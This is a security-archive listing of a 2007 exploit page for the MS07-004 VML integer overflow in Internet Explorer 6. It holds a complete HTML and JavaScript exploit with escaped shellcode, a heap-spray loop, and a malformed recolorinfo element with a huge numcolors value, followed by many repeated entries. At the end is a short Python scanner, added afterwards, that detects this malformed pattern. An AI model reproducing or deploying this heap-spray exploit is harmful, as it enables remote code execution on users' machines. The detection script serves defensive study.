ms07-004.txt

20 Jan 2007 00:00:00 | Reported by lifeasageek | Type: packetstorm | Source: packetstormsecurity.com

MS07-004 VML integer overflow exploit by lifeasageek. Tested on WinXP SP2 Korean version & IE 6.0. Sorry, the exploit hit ratio is only about 1/5. All the JavaScript code was scratched from the MS06-055 exploit written by Trirat Puttaraksa.

Code
`  
<!--  
  
MS07-004 VML integer overflow exploit   
by lifeasageek at gmail.com  
  
- Trigger CVMLRecolorinfo::InternalLoad() method  
you can see the screen captured image "http://picasaweb.google.com/lifeasageek/MS07004/photo?pli=1#5019163989136880322"  
which is generated by DarunGrim  
  
- tested on WinXP SP2 Korean version( fully patched except kb929969) & IE 6.0  
and I hope it works well in English version  
  
- sorry about that exploit hit ratio is only about 1/5  
If you have any good idea to improve reliability, please send me an  
e-mail with your idea  
  
- all the java script codes scratched from MS06-055 exploit written  
by Trirat Puttaraksa (Kira) <trir00t [at] gmail.com>  
and slightly modified  
  
- 2007.1.15  
  
-->  
  
<html xmlns:v="urn:schemas-microsoft-com:vml">  
  
<head>  
<object id="VMLRender"  
classid="CLSID:10072CEC-8CC1-11D1-986E-00A0C955B42E">  
</object>  
<style>  
v\:* { behavior: url(#VMLRender); }  
</style>  
</head>  
  
<body>  
  
<SCRIPT language="javascript">  
shellcode =  
unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");  
  
bigblock = unescape("%u0505%u0505");  
headersize = 20;  
slackspace = headersize+shellcode.length;  
while (bigblock.length<slackspace) bigblock+=bigblock;  
fillblock = bigblock.substring(0, slackspace);  
block = bigblock.substring(0, bigblock.length-slackspace);  
while(block.length+slackspace<0x40000) block = block+block+fillblock;  
memory = new Array();  
for (i=0;i<350;i++) memory[i] = block + shellcode;  
  
</script>  
  
<v:rect style='width:120pt;height:80pt' fillcolor="red" >  
<v:recolorinfo recolorstate="t" numcolors="97612895">  
  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v/recolorinfo>  
</html>   
`
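A defensive check for the pattern visible in this sample, added here as an example (it is not part of the original exploit or of the hosting page): it scans HTML for VML `recolorinfo` elements whose declared `numcolors` is implausibly large, malformed, or inconsistent with the number of `recolorinfoentry` children present. The threshold `MAX_SANE_NUMCOLORS`, the count-mismatch heuristic and all function and class names are assumptions chosen for illustration.

```python
from html.parser import HTMLParser

# Assumed threshold (not from the page): real recolor tables are small.
MAX_SANE_NUMCOLORS = 4096

class RecolorScanner(HTMLParser):
    """Records declared numcolors vs. counted entries per recolorinfo element."""

    def __init__(self):
        super().__init__()
        self.records = []
        self._open = None  # recolorinfo element currently being counted

    def handle_starttag(self, tag, attrs):
        name = tag.rsplit(":", 1)[-1]  # drop namespace prefix such as "v:"
        if name == "recolorinfo":
            self._open = {"raw": dict(attrs).get("numcolors"), "entries": 0}
            self.records.append(self._open)
        elif name == "recolorinfoentry" and self._open is not None:
            self._open["entries"] += 1

    def handle_endtag(self, tag):
        if tag.rsplit(":", 1)[-1] == "recolorinfo":
            self._open = None

def scan_vml(html_text):
    """Return one reason string per suspicious recolorinfo element."""
    scanner = RecolorScanner()
    scanner.feed(html_text)
    scanner.close()
    findings = []
    for rec in scanner.records:
        raw = rec["raw"]
        if raw is None:
            continue  # no declared count, nothing to compare
        if not raw.strip().isdecimal():
            findings.append(f"malformed numcolors {raw!r}")
        elif int(raw) > MAX_SANE_NUMCOLORS:
            findings.append(f"numcolors {int(raw)} exceeds {MAX_SANE_NUMCOLORS}")
        elif int(raw) != rec["entries"]:
            findings.append(f"numcolors {int(raw)} but {rec['entries']} entries")
    return findings

# Constructed samples (not taken from any real document).
BENIGN = ('<v:rect><v:recolorinfo numcolors="2"><v:recolorinfoentry/>'
          '<v:recolorinfoentry/></v:recolorinfo></v:rect>')
OVERSIZED = ('<v:rect><v:recolorinfo numcolors="97612895">'
             '<v:recolorinfoentry/></v:recolorinfo></v:rect>')
```
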
